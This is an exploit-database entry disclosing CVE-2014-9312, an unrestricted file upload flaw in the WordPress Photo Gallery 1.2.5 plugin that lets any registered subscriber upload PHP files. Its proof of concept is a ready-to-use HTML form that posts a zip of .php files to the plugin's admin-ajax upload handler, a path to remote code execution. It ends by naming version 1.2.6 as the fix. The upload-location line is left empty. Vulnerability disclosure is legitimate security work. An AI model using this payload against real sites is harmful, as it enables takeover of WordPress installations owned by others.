Wordpress Photo Gallery 1.2.5 Unrestricted File Upload Vulnerability

ID 1337DAY-ID-23199
Type zdt
Reporter Kacper Szurek
Modified 2015-01-26T00:00:00


Exploit for php platform in category web applications

                                            # Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps

1. Description
Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php

2. Proof of Concept

Login as regular user (created using wp-login.php?action=register).

Pack .php files into .zip archive then send it using:

<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">

Your files will be visible inside:

3. Solution:
Update to version 1.2.6

#  0day.today [2018-01-05]  #